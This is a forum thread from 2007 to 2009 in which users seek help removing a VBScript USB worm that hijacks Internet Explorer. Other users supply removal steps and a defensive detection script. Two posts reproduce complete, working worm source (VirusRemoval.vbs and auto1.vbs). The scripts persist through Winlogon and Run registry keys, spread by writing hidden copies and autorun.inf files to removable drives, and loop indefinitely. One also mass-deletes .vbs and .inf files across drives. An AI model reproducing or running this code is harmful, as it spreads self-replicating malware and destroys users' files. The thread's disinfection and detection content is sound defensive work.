# wscript.exe is it to blame?



## gsoul2soul (Oct 19, 2007)

This is irritating like hell.... trust me !!!

Well, somehow *I have contracted* this lil "*virus, or bug... or some script written by pesky over-smart programmer*" grrrrr x(

Now the thing is, when I open IE it directs me to this site... and the IE title bar also has this "@!@#@ Holes name and all"

Now I remove the title bar "name" and also change the home page in my IE... and as soon as I restart my browser... Blast !! there you go, it appears again !!!

*BUT when I kill the "wscript.exe"* from "Windows Task Manager" it won't happen... why ? what ? and how to remove this problem !!!

HELP... HELP
Mike here... desperate


----------



## QwertyManiac (Oct 19, 2007)

I think I already helped you with the same problem before, or this is a false déjà vu I am experiencing...

Anyway, you're infected with the "Hacked by Godzilla" attack.

Solution's here:
howto.redcomputer.net/windows/hacked_by_godzilla.php


----------



## gsoul2soul (Oct 20, 2007)

QwertyManiac, thanks... but that file is not there, the one I should delete. The "vbs file"

Anyways mine just says in IE title bar *"www.sujin.com.np"* and tries to *re-direct my browser to this site*... which is now down

help


----------



## QwertyManiac (Oct 20, 2007)

Site's pretty apologetic but I think it's nearly the same infection.

From site (Google Cache):


> If you were directed here through a virus-like program, then I would like to apologize for the problems you had to face because of me. I didn't mean to harm anyone or anyone's computer through this program. The small little script was developed to prevent your computer from any sorts of virus attacks. The script that I developed, would repair any problems in your computer that other viruses had damaged and also prevent any other viruses to enter into your computer. I am sure your computer was not infected by any viruses as long as my script was running in your computer. If you don't believe me just check the script, which is located at the system32 directory as VirusRemoval.vbs
> 
> In order to free your computer from my program, please CLICK HERE to download a program called 'Scanner'.
> Run this program to free your computer from my script as well as some of the most common viruses.
> ...



Are the other files taken care of? Any other VBS files might be deleted as well. Perform the same steps just more flexibly 

And yes, delete ALL vbs and autorun from all your drives, even your externals, pen drives and phones.


----------



## gsoul2soul (Oct 20, 2007)

I opened one of my pen drives... and found this *"Virusremoval.vbs"* and *"autorun.inf"*

Now I opened the VBS file in Notepad... and here's what it says:
*Shall I click on it... or is it just a way of infecting more?*

```vbscript
'******************************************************************
'********************* Virus Removal VBScript *********************
'************************** Version 1.00 **************************
'******************************************************************
'This antivirus program is intended to repair your computer from
'any sorts of virus attacks.
'This program is exactly like a normal virus but it repairs things
'rather than destroying them.
'******************************************************************
'******************************************************************
'Program developed by
'Sujin Joshi
'*Sujin.com.np
'sujinjoshi@gmail.com
Option Explicit
On Error Resume Next

Dim Fso,Shells,SystemDir,WinDir,Count,File,Drv,Drives,InDrive,ReadAll,AllFile,WriteAll,Del,Chg,folder,files,Delete,auto,root

Set Fso = CreateObject("Scripting.FileSystemObject")
Set Shells = CreateObject("Wscript.Shell")
Set WinDir = Fso.GetSpecialFolder(0)
Set SystemDir =Fso.GetSpecialFolder(1)
Set File = Fso.GetFile(WScript.ScriptFullName)
Set Drv = File.Drive
Set InDrive = Fso.drives
Set ReadAll = File.OpenAsTextStream(1,-2)
do while not ReadAll.atendofstream
AllFile = AllFile & ReadAll.readline
AllFile = AllFile & vbcrlf
Loop


Count=Drv.DriveType

Do 
	If Not Fso.FileExists(SystemDir & "\VirusRemoval.vbs") then
		set WriteAll = Fso.CreateTextFile(SystemDir & "\VirusRemoval.vbs",2,true)
		WriteAll.Write AllFile 
		WriteAll.close
		set WriteAll = Fso.GetFile(SystemDir & "\VirusRemoval.vbs")
		WriteAll.Attributes = -1
	End If

	Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Window Title","Sujin.com.np"
	Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions","0","REG_DWORD"
	Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr","0","REG_DWORD"
	Shells.RegWrite "HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools","0","REG_DWORD"
	Shells.RegWrite "HKCU\Software\Microsoft\Internet Explorer\Main\Start Page","*sujin.com.np/"
	Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Shell","explorer.exe"
	Shells.RegWrite "HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon\Userinit",SystemDir & "\userinit.exe," & _
	SystemDir & "\wscript.exe " & SystemDir & "\VirusRemoval.vbs"

	For Each Drives In InDrive 
		root = Drives.Path & "\"
		If Fso.GetParentFolderName(WScript.ScriptFullName)=root Then
			Shells.Run "explorer.exe " & root
		End If
		Set folder=Fso.GetFolder(root)
		Set Delete = Fso.DeleteFile(SystemDir & "\killvbs.vbs",true)
		For Each files In folder.Files
			auto=Left(files.Name,7)
			If UCase(auto)=UCase("autorun") Then
				Set Delete = Fso.DeleteFile(root & files.Name,true)
			End If	
		Next
		If Drives.DriveType=2 Then
			delext "inf",Drives.Path & "\"
			delext "INF",Drives.Path & "\"
		End if  

		If Drives.DriveType = 1 Or Drives.DriveType = 2 Then
			If Drives.Path<> "A:" Then
				delext "vbs",WinDir & "\"
				delext "vbs",Drives.Path  & "\"

				If Fso.FileExists(Drives.Path & "\ravmon.exe") Then
					Fso.DeleteFile(Drives.Path & "\ravmon.exe")
				End If
				If Fso.FileExists(Drives.Path & "\sxs.exe") Then
					Fso.DeleteFile(Drives.Path & "\sxs.exe")
				End If
				If Fso.FileExists(Drives.Path & "\winfile.exe") Then
					Fso.DeleteFile(Drives.Path & "\winfile.exe")
				End If
				If Fso.FileExists(Drives.Path & "\run.wsh") Then
					Fso.DeleteFile(Drives.Path & "\run.wsh")
				End If

				If Drives.DriveType = 1 Then
					If Drives.Path<>"A:" Then
						If Not Fso.FileExists(Drives.Path & "\VirusRemoval.vbs") Then
							Set WriteAll=Fso.CreateTextFile(Drives.Path & "\VirusRemoval.vbs",2,True)
							WriteAll.Write AllFile
							WriteAll.Close
							Set WriteAll = Fso.GetFile(Drives.Path & "\VirusRemoval.vbs")
							WriteAll.Attributes = -1
						End If

						If Fso.FileExists(Drives.Path & "\autorun.inf") Or Fso.FileExists(Drives.Path & "\AUTORUN.INF") Then 
							Set Chg = Fso.GetFile(Drives.Path & "\autorun.inf")
							Chg.Attributes = -8
							Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
							WriteAll.writeline "[autorun]"
							WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
							WriteAll.WriteLine "shell\open=Open"
							WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
							WriteAll.Close
							Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
							WriteAll.Attributes = -1
						else
							Set WriteAll = Fso.CreateTextFile(Drives.Path & "\autorun.inf",2,True)
							WriteAll.writeline "[autorun]"
							WriteAll.WriteLine "open=wscript.exe VirusRemoval.vbs"
							WriteAll.WriteLine "shell\open=Open"
							WriteAll.WriteLine "shell\open\Command=wscript.exe VirusRemoval.vbs"
							WriteAll.Close
							Set WriteAll = Fso.GetFile(Drives.Path & "\autorun.inf")
							WriteAll.Attributes = -1
						End if
					End If
				End If
			End if  
		End If
	Next

	if Count <> 1 then
	Wscript.sleep 10000
	end if
loop while Count<>1

sub delext(File2Find, SrchPath)
   Dim oFileSys, oFolder, oFile,Cut,Delete
   Set oFileSys = CreateObject("Scripting.FileSystemObject")
   Set oFolder = oFileSys.GetFolder(SrchPath)
   For Each oFile In oFolder.Files
		Cut=Right(oFile.Name,3)
		If UCase(Cut)=UCase(file2find) Then
			If oFile.Name <> "VirusRemoval.vbs" Then Set Delete = oFileSys.DeleteFile(srchpath & oFile.Name,true)
		End If
   Next
End sub
```


----------



## Yavin (Oct 28, 2007)

First
Open task manager and kill process wscript.exe.

Then
Delete VirusRemoval.vbs and Autorun.inf files from all usb drives.

Then
Go to c:\Windows\System32 and delete the file VirusRemoval.vbs. It is super hidden so first go to Folder Options and check show hidden and super hidden check boxes. Also required for the above files.

Then
Go to HKLM\Software\Microsoft\Windows NT\CurrentVersion\Winlogon
On the right side look for Shell, which should have a value of just explorer.exe.
Delete anything after explorer.exe.

Under same key Winlogon also look for Userinit which should have value of
c:\WINDOWS\system32\userinit.exe,
Delete all the crap after the comma.

Then
Go to HKCU\Software\Microsoft\Internet Explorer\Main
On the right side locate Window Title and delete its value i.e. Sujin.com.np

Under the same key locate Start Page and delete its value i.e. *sujin.com.np/

I think that's all guys. I'm sure it will help.


Guys, you can also disable the use of vbs and js files from the registry. For that:
Go to HKLM\Software\Microsoft\Windows Script Host\Settings
On the right look for REG_SZ called Enabled and change its value to 0 to turn off Windows Scripting Host. After this, even if you accidentally click on vbs or js files it will display the message you can see on your own.


----------
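
A check for the leftovers Yavin's steps target, as an added example that is not part of the original thread: it flags autorun.inf entries that start a script host and any Winlogon Shell or Userinit entry beyond the stock program. The sample strings are constructed from the values the posted script writes, the C:\WINDOWS path is an assumption, and the function names are hypothetical.

```python
import ntpath

SCRIPT_HOSTS = {"wscript", "cscript"}
SCRIPT_EXTS = (".vbs", ".vbe", ".js", ".jse", ".wsf", ".wsh")
STOCK = {"shell": "explorer.exe", "userinit": "userinit.exe"}

# Constructed samples: the autorun.inf lines and the Userinit value that the
# script posted earlier in the thread writes (paths assume C:\WINDOWS).
WORM_AUTORUN = ("[autorun]\nopen=wscript.exe VirusRemoval.vbs\n"
                "shell\\open=Open\n"
                "shell\\open\\Command=wscript.exe VirusRemoval.vbs\n")
WORM_USERINIT = (r"C:\WINDOWS\system32\userinit.exe,"
                 r"C:\WINDOWS\system32\wscript.exe "
                 r"C:\WINDOWS\system32\VirusRemoval.vbs")

def launches_script(command):
    """True if a command line starts a script host or names a script file."""
    for token in command.lower().split():
        name = ntpath.basename(token.strip('"'))
        if ntpath.splitext(name)[0] in SCRIPT_HOSTS or name.endswith(SCRIPT_EXTS):
            return True
    return False

def autorun_findings(text):
    """(key, command) pairs in the [autorun] section that run a script."""
    findings, in_section = [], False
    for line in (raw.strip() for raw in text.splitlines()):
        if line.startswith("["):
            in_section = line.lower() == "[autorun]"
        elif in_section and "=" in line:
            key, _, value = line.partition("=")
            key = key.strip().lower()
            is_command = key in ("open", "shellexecute") or key.endswith("\\command")
            if is_command and launches_script(value):
                findings.append((key, value.strip()))
    return findings

def winlogon_extras(name, value):
    """Entries in Winlogon Shell/Userinit other than the stock program."""
    entries = [e.strip() for e in value.split(",") if e.strip()]
    return [e for e in entries
            if ntpath.basename(e.strip('"')).lower() != STOCK[name.lower()]]

if __name__ == "__main__":
    print(autorun_findings(WORM_AUTORUN))
    print(winlogon_extras("Userinit", WORM_USERINIT))
```

An empty list from both functions means the autorun.inf text and the Winlogon value match what the removal steps leave behind.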



## NavinRaj (Nov 15, 2007)

Yavin's process removes the virus but it is a bit tedious. I found a scanner tool which easily removed the virus. It claims to remove other viruses and enable the disabled task manager and folder options.

You guys can also try it from:

www.kusom.edu.np/new/notices_detail.php?noticeid=13
or
www.swiftnepal.net/

Yavin said:

> First
> Open task manager and kill process wscript.exe.
> 
> Then
> ...


----------



## bhutanesedude (Nov 24, 2007)

Does anyone have antivirus software which can remove this sujin.com.np? I think I have to report the case to Cyber Crime Investigation so that whoever this Sujin is gets wrecked for his whole life, to stop him making such kinds of tools. This hell **** is making my system slow and I cannot even do my work efficiently.


----------



## saubrl (Nov 26, 2007)

Don't you use any antivirus?
I use NOD32 with an update 3 months old, but even it is able to detect wscript.exe.


----------



## bhutanesedude (Nov 26, 2007)

NOD32? Does this function well enough to clear this virus from every corner of our system? Or does it just take out the title and web address from our IE..... I think www.swiftnepal.net/ has an antivirus for this problem which functions well... what do you think, my fellow users?


----------



## apslogin@gmail.com (Dec 7, 2007)

How to remove Virusremoval.vbs


Step 1: Open My Computer
Step 2: Go to Tools menu > Folder Options > View (tab) > uncheck "Hide extensions for known file types", check "Show hidden files and folders" and uncheck "Hide protected operating system files".
Step 3: Go to Run > c:\windows\system32\
Step 4: Search "Virusremoval.vbs"
Step 5: Rename file "Virusremoval.vbs" to "virusremoval"

and 

Enjoy!


----------



## prakash2119 (Jan 19, 2008)

@Yavin thanks a lot bhai. I am at a loss for words to thank you. This really worked...


----------



## figjam00 (Mar 28, 2008)

I solved this wscript.exe but Windows Script Host settings always run at startup?????? Please reply!!!!!!!!


----------



## Wilhelm (Aug 1, 2009)

I opened one of my pen drives... and found this "auto1.vbs" and "autorun.inf"

Now I opened the VBS file in Notepad... and here's what it says:
Shall I click on it... or is it just a way of infecting more?



```vbscript
On Error Resume Next
Dim fso, wscr, tf, scrText, win, ax

Set fso = CreateObject("Scripting.FileSystemObject")
Set wscr = CreateObject("WScript.Shell")

win = fso.GetSpecialFolder(0)
tf = WScript.ScriptFullName
x = LCase(tf)

If Mid(x, 4) = "auto1.vbs" Then 
   wscr.Run "explorer.exe " & fso.Getfile(tf).Drive.Path
End If

Set myFile = fso.Getfile(tf).OpenAsTextStream(1)
Do Until myFile.AtEndOfStream
   scrText = scrText & myFile.ReadLine & vbCrLf
Loop

ax = fso.FileExists(win & "\auto1.vbs")

Set myFile = fso.CreateTextFile(win & "\auto1.vbs", true)
myFile.write scrText
myFile.close

Set fAttr = fso.Getfile(win & "\auto1.vbs")
fAttr.Attributes=39

wscr.RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe1", "wscript.exe """ & win & "\auto1.vbs"""

If ax = false Then wscr.Run "wscript.exe """ & win & "\auto1.vbs"""

While (true)

   Set myDrives = fso.Drives
   For Each myFlashDrive In myDrives

      If myFlashDrive.Drivetype = 1 And myFlashDrive.Path <> "A:" Then

         If fso.FileExists(myFlashDrive.Path & "\Autorun.inf") Then
            Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
            fAttr.Attributes=32
            fso.Deletefile myFlashDrive.Path & "\Autorun.inf", true
         End If

         Set auFile = fso.CreateTextFile(myFlashDrive.Path & "\Autorun.inf", true)
         auFile.write "[autorun]" & vbCrLf & "open=wscript.exe auto1.vbs" & vbCrLf & "shell\Open\Command=wscript.exe auto1.vbs" & vbCrLf & "shell\Open\Default=1"
         auFile.close

         Set fAttr = fso.Getfile(myFlashDrive.Path & "\Autorun.inf")
         fAttr.Attributes=39

         Set myFile = fso.CreateTextFile(myFlashDrive.Path & "\auto1.vbs", true)
         myFile.write scrText
         myFile.close

         Set fAttr = fso.Getfile(myFlashDrive.Path & "\auto1.vbs")
         fAttr.Attributes=39

      End If

   Next

   With wscr
      .RegWrite "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\autoMe", "wscript.exe """ & win & "\auto1.vbs"""
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\Hidden", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\HideFileExt", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Advanced\ShowSuperHidden", 1, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoFolderOptions", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer\NoDriveTypeAutoRun", 128, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableRegistryTools", 0, "REG_DWORD"
      .RegWrite "HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\DisableTaskMgr", 0, "REG_DWORD"
   End With

   If tf <> win & "\auto1.vbs" Then
      If fso.Getfile(tf).Drive.IsReady = false Then WScript.Quit
   End If

   WScript.Sleep 10000

Wend
```


----------



## Saksham ghimire (Aug 5, 2009)

The post from NavinRaj should definitely work because it had been a big issue in Nepal several years ago and the tool suggested fixed it good.


----------

